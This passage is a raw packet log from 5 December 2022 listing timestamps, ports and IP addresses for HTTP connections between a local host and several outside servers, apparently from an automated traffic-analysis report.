                                                                                                                                                                          Dec 5, 2022 15:17:40.836297035 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836349964 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836429119 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836457968 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836484909 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836513996 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836549997 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836579084 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836605072 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836631060 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836658001 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836685896 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836687088 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:40.836726904 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836755037 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836781979 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836807966 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836833954 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836869001 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836899042 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836925983 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.836961031 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.837028980 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:40.837244034 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:41.744436026 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.760078907 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.805840969 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.806066990 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.806799889 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.806889057 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.852451086 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.852530003 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.852588892 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.852701902 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.852823973 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.852832079 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.852910042 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.853034973 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.853074074 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.853132010 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.853188992 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.853209019 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.853389978 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.853543043 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.853723049 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.898269892 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.898499966 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.898597002 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.898662090 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.898746014 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.898760080 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.898809910 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.898936987 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.899004936 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.899041891 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.899065971 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.899092913 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.899101973 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.899171114 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.899197102 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.899300098 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.899324894 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.899533033 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.899668932 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.944158077 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.944180012 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.944278002 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.944448948 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.944468021 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.944703102 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.944825888 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.944848061 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.944864988 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977089882 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977190971 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977263927 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977334976 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977391005 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977444887 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977514982 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977572918 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977629900 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977688074 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.977689028 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.977701902 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:42.977855921 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:42.978008032 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.023533106 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.023633957 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.023695946 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.023762941 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.023823977 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.023861885 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.023880005 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.023941040 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.023951054 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024008989 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024065018 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024092913 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.024137020 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024194002 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024220943 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.024251938 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024359941 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024418116 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.024421930 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024470091 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.024494886 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024549961 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024606943 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.024620056 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024682045 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024734974 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024734020 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.024807930 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.024866104 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.024868965 CET8049891195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:43.025022030 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.025022030 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:43.822448969 CET4989180192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.837620974 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.890074015 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.890435934 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.890521049 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.942858934 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945007086 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945063114 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945091963 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945117950 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945147038 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945173979 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945200920 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945226908 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945281029 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.945328951 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945343018 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.945343018 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.945358038 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.945568085 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.997735023 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.997773886 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.997802019 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.997828960 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.997854948 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.997881889 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.997909069 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.997937918 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.997965097 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.997987032 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.997992039 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998020887 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998022079 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.998047113 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998074055 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998101950 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998127937 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998150110 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.998155117 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998183012 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998188972 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.998209000 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998235941 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998262882 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998284101 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.998292923 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:44.998383999 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.998497963 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.998624086 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:44.998749018 CET4989280192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:45.051043987 CET8049892195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:50.499320030 CET4989480192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:50.660300016 CET8049894192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:50.660536051 CET4989480192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:50.660666943 CET4989480192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:50.821590900 CET8049894192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:50.832380056 CET8049894192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:50.832556009 CET8049894192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:50.832731009 CET4989480192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:51.664212942 CET4989480192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:52.679791927 CET4989680192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:52.841070890 CET8049896192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:52.841413975 CET4989680192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:52.841530085 CET4989680192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:53.002878904 CET8049896192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:53.014596939 CET8049896192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:53.014658928 CET8049896192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:53.014863014 CET4989680192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:53.851063013 CET4989680192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:54.866770983 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.029040098 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.029419899 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.030141115 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.030236006 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.192573071 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.192765951 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.192815065 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.192903996 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.192960978 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.192996025 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.193067074 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.193118095 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.193131924 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.193193913 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.193255901 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.193311930 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.193316936 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.193392038 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.193473101 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.193645954 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.356089115 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.356184006 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.356257915 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.356333971 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.356389046 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.356426954 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.356478930 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.356574059 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.356590033 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.356694937 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.356744051 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.356753111 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.356838942 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.356911898 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:55.356933117 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.357031107 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.357089996 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.357146025 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.519372940 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.519470930 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.519524097 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.519589901 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.519820929 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.519896984 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.522764921 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.522845030 CET8049897192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:55.523147106 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:56.038125038 CET4989780192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:57.053688049 CET4989880192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:57.214953899 CET8049898192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:57.215270996 CET4989880192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:57.215333939 CET4989880192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:57.376640081 CET8049898192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:57.384748936 CET8049898192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:57.386368990 CET8049898192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:57.386742115 CET4989880192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:57.386742115 CET4989880192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:17:57.547497988 CET8049898192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:12.347640038 CET4989980192.168.11.20198.58.118.167
                                                                                                                                                                          Dec 5, 2022 15:18:12.481970072 CET8049899198.58.118.167192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:12.482435942 CET4989980192.168.11.20198.58.118.167
                                                                                                                                                                          Dec 5, 2022 15:18:12.482553005 CET4989980192.168.11.20198.58.118.167
                                                                                                                                                                          Dec 5, 2022 15:18:12.617708921 CET8049899198.58.118.167192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:12.617777109 CET8049899198.58.118.167192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:12.618146896 CET4989980192.168.11.20198.58.118.167
                                                                                                                                                                          Dec 5, 2022 15:18:12.618237019 CET4989980192.168.11.20198.58.118.167
                                                                                                                                                                          Dec 5, 2022 15:18:12.752301931 CET8049899198.58.118.167192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:17.628014088 CET4990080192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:17.686434984 CET804990045.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:17.686590910 CET4990080192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:17.686798096 CET4990080192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:17.745160103 CET804990045.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:17.779515028 CET804990045.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:17.779584885 CET804990045.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:17.779937029 CET4990080192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:18.689496994 CET4990080192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:19.705084085 CET4990180192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:19.764266968 CET804990145.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:19.764620066 CET4990180192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:19.764832973 CET4990180192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:19.823492050 CET804990145.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:20.609693050 CET804990145.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:20.609776020 CET804990145.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:20.610057116 CET4990180192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:20.766976118 CET4990180192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.783675909 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.838004112 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.838234901 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.838819027 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.838905096 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.893043995 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.893280029 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.893543959 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.893788099 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.893879890 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.894038916 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.894129038 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.894298077 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.894413948 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.894639015 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.894685984 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.894751072 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.894922018 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.895085096 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.895134926 CET804990345.130.41.24192.168.11.20
